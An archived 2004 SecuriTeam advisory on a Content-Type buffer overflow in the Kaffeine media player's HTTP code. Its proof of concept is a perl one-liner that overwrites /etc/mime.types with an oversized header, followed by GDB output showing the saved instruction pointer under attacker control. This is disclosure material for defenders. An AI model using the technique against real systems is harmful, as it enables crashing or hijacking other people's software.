[UNIX] Kaffeine Media Player Content-Type Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 10/26/04

  • Next message: SecuriTeam: "[TOOL] HTMLer - An Automated Broken HTML Generator (Mangleme Python Port)"
    To: list@securiteam.com
    Date: 26 Oct 2004 18:22:38 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Kaffeine Media Player Content-Type Overflow
    ------------------------------------------------------------------------

    SUMMARY

     <http://kaffeine.sourceforge.net/> Kaffeine is "a xine based media player
    for KDE3."

    A buffer overflow attack is possible in kaffeine by supplying a RealAudio
    media playlist file with an improper Content-Type field.

    DETAILS

    Vulnerable Systems:
     * Kaffeine versions 0.4.2 and above

    The vulnerability can be triggered by providing the application with a
    Real Audio Media - ram - playlist file which has it's Content-Type field
    crafted to contain very large inputs. The file type limitations are
    derived from the following code:
    PlayList::LoadRamPlaylist( const KURL& kurl, QListViewItem* after)
    .
        /* check for ram playlist */
         if ( (ext == "ra") || (ext == "rm") || (ext == "ram") || (ext ==
    "lsc") || (ext == "pl") )
         {
    ..

    The bug associated with this overflow is located in the following piece of
    code, taken from 'kaffeine-0.4.3b/kaffeine/http.c':
    static http_t *http_open (const char *mrl) {

      http_t *this;
    ..
            if (sscanf(this->buf, "Content-Type: %s", mime_type) == 1) {

    A simple proof of concept would be to modify the Content-Type in
    /etc/mimetypes and for the ram extension, setting it to:
    AAAAAAAAAAAAA ............. A
    Instead of the usual name: audio/x-pn-realaudio. Example:

    linux:/srv/www/htdocs # echo `perl -e 'print "A" x 316 . "ZZZZABCD"'` ram
    > /etc/mime.types ; /etc/init.d/apache2 restart
    Syntax OK
    Shutting down httpd2 (waiting for all children to terminate) done
    Starting httpd2 (prefork)

    [root@threat root]# kaffeine http://192.168.1.207/test.pl
    http: content length = 30 bytes
    http: content type = 'text/plain;'
    http: content length = 0 bytes
    http: content type =
    'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAZZZZABCD'
    [root@threat root]# KCrash: Application 'kaffeine' crashing...

    Then, create a sample RealMedia file (.rm) and allow your webserver to
    offer the file via HTTP. Kaffeine will attempt to download and play the
    file and the Content-Type header received will be copied to a small
    buffer, hence causing an overflow. Of course, another trigger is to view
    the file directly with Kaffeine. The output from GDB looks similar to
    this:
    gdb) c
    Continuing.
    http: content length = 30 bytes
    http: content type = 'text/plain;'
    http: content length = 0 bytes
    http: content type =
    'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZZZZABCD'

    Program received signal SIGSEGV, Segmentation fault.
    [Switching to Thread -150400896 (LWP 2328)]
    0x080b869c in SubtitleChooser::staticMetaObject ()
    (gdb) bt
    #0 0x080b869c in SubtitleChooser::staticMetaObject ()
    #1 0x5a5a5a5a in ?? ()
    #2 0x44434241 in ?? ()
    #3 0x097a1200 in ?? ()
    #4 0x00000000 in ?? ()
    #5 0x00000000 in ?? ()
    #6 0x00000000 in ?? ()
    #7 0x00000000 in ?? ()
    #8 0xfef17b28 in ?? ()
    #9 0x09794b70 in ?? ()
    #10 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4
    #11 0x00000018 in ?? ()
    #12 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4
    #13 0x096c3770 in ?? ()
    #14 0x096c3760 in ?? ()
    #15 0x05f04ac0 in kde_malloc_is_used () from /usr/lib/libkdecore.so.4
    #16 0xfef17b48 in ?? ()
    #17 0x05ec8dea in malloc () from /usr/lib/libkdecore.so.4
    Previous frame inner to this frame (corrupt stack?)

    (gdb) i f
    Stack level 0, frame at 0xfef17ae0:
     eip = 0x80b869c in SubtitleChooser::staticMetaObject(); saved eip
    0x5a5a5a5a
     called by frame at 0xfef17ae4
     Arglist at 0xfef17ad8, args:
     Locals at 0xfef17ad8, Previous frame's sp is 0xfef17ae0
     Saved registers:
      ebp at 0xfef17ad8, eip at 0xfef17adc

    0xfeea9b20: 'A' <repeats 200 times>...
    0xfeea9be8: 'A' <repeats 116 times>, "ZZZZABCD"

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:kfinisterre@secnetops.biz>
    KF.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[TOOL] HTMLer - An Automated Broken HTML Generator (Mangleme Python Port)"

    Relevant Pages

    • [Full-Disclosure] Kaffeine Media Player Conteny Type overflow
      ... # kaffeine http://192.168.1.207/test.pl ... http: content type = 'text/plain;' ... exact eip hit looks like this ... Previous frame inner to this frame ...
      (Full-Disclosure)
    • [UNIX] wget and curl NTLM Username Buffer Overflow
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... package for retrieving files using HTTP, HTTPS and FTP, the most ... curl supports HTTPS certificates, HTTP POST, ... The vulnerability specifically exists due to insufficient bounds checking ...
      (Securiteam)
    • [NEWS] GCALDaemon DoS
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Java program that offers two-way synchronization between Google Calendar ... over HTTP, by uploading their file via an HTTP PUT and getting/refreshing ...
      (Securiteam)
    • [NEWS] SAP WebAS URL Manipulation
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... SAP Web Application Server is the application platform of SAP ... Also the vulnerability may aid an attacker in manipulating the way a ... http request URL, followed by the characters to be inserted, replacing all ...
      (Securiteam)
    • [UNIX] cURL Buffer Overflow (tftp URL)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... cURL Buffer Overflow (tftp URL) ... curl supports HTTPS certificates, HTTP POST, HTTP ...
      (Securiteam)